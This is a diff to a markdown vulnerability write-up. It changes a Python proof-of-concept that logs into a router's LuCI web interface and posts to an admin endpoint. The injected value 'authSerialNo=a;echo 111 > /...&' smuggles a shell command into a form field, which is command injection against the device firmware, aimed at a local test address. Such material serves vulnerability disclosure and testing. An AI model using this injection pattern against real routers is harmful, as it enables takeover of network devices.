--- a/3.md
+++ b/3.md
@@ -123,7 +123,7 @@ Priority: u=0, i
     sysauth = set_cookie.split("; ")[0].split("=")[1]
 
 
-    make_POST_request(url+path+"/admin/system/set_system_settings",str_to_head_dict("""
+    make_POST_request(url+path+"/admin/gpon/set-net-settings",str_to_head_dict("""
 Host: 172.17.0.2
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
@@ -133,12 +133,10 @@ Connection: keep-alive
 Referer: http://172.17.0.2/cgi-bin/luci
 Cookie: sysauth={}; repeatTimes=0; isLogin=true; __guid=209503442.1611206664802250800.1716428588737.2761
 Upgrade-Insecure-Requests: 1
-Priority: u=0, i""".format(sysauth)),parse_query_string_nowhite("""lanIp=1;echo 111 > /1011854_test_action_set_system_setting  """),1)#,0,proxy=proxies1)0,proxy=proxies1)
+Priority: u=0, i""".format(sysauth)),parse_query_string_nowhite("""authSerialNo=a;echo 111 > /1011854_test_action_set_net_settings& """),1)#,0,proxy=proxies1)0,proxy=proxies1)
 
 
 ```
-
-
 
 #### Result
 
